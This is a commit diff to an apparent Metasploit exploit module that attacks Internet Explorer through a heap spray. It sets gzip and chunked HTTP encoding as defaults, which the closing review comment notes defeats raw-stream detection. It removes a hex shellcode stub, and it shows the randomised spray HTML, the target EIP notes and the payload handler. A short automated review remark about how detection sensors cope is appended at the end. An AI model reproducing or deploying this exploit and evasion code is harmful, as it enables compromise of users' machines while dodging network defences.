Correct some assumptions about client-side exploit signature development, remove the prepend since we dont use .net anymore
git-svn-id: file:///home/svn/framework3/trunk@7616 4d416f70-5f16-0410-b530-b9f4589650da
parent
e3a1a7958e
commit
927563c135
|
@ -50,7 +50,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'EXITFUNC' => 'process',
|
||||
'HTTP::compression' => 'gzip',
|
||||
'HTTP::chunked' => true
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -60,20 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
'StackAdjustment' => -3500,
|
||||
|
||||
# Temporary stub virtualalloc() + memcpy() payload to RWX page
|
||||
'PrependEncoder' =>
|
||||
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+
|
||||
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+
|
||||
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+
|
||||
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
|
||||
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
|
||||
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
|
||||
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x54"+
|
||||
"\xca\xaf\x91\xff\xd6\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08"+
|
||||
"\x56\x6a\x00\xff\xd0\x89\xc3\xeb\x0d\x5e\x89\xdf\xb9\xe8\x03\x00"+
|
||||
"\x00\xfc\xf3\xa4\xff\xe3\xe8\xee\xff\xff\xff"
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
|
@ -85,16 +74,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
# resulting eips:
|
||||
# 0x501d6bd8 # windows vista ie7 (mshtml.dll 7.0.6001.18203)
|
||||
# 0xc5fe7dc9 # windows xp sp3 ie6 (mshtml.dll 6.0.2900.5848)
|
||||
# nul deref! # windows xp sp3 ie7 (mshtml.dll 7.0.5730.13)
|
||||
# 0x6e767fae # windows 2k3 sp2 ie6 (mshtml.dll 6.0.3790.4470)
|
||||
# 0x6cf941a7 # windows 2k3 sp2 ie7 (mshtml.dll 7.0.6000.16825)
|
||||
|
||||
|
||||
print_status("Entering heap spray mode for #{cli.peerhost}:#{cli.peerport}")
|
||||
|
||||
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_boom = rand_text_alpha(rand(100) + 1)
|
||||
var_body = rand_text_alpha(rand(100) + 1)
|
||||
|
@ -106,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var_ss = rand_text_alpha(rand(100) + 1)
|
||||
var_fb = rand_text_alpha(rand(100) + 1)
|
||||
var_bk = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
|
||||
html = %Q|<!DOCTYPE>
|
||||
<head>
|
||||
<script language=javascript>
|
||||
|
@ -130,10 +119,10 @@ for (#{var_i}=0;#{var_i}<1285;#{var_i}++) #{var_memory}[#{var_i}]=#{var_bk}+#{va
|
|||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
||||
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
|
|
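Review bot: The two entries added under 'DefaultOptions' in the first hunk, `'HTTP::compression' => 'gzip'` and `'HTTP::chunked' => true`, have no comment explaining why they are now defaults; the only rationale is the commit message, which presumably means signatures should be developed against the decoded response. A comment above them would keep that reasoning with the code, for example `# Serve the page gzip-compressed and chunked by default so signatures are written against the decoded HTTP body, not the raw bytes on the wire`. For anyone maintaining detection for this module, a sensor then has to dechunk and decompress the HTTP response before content matching, because a raw-stream match on the page body will not fire. The module's info hash starts above the hunk, so whether other options already set or override these two cannot be seen from here.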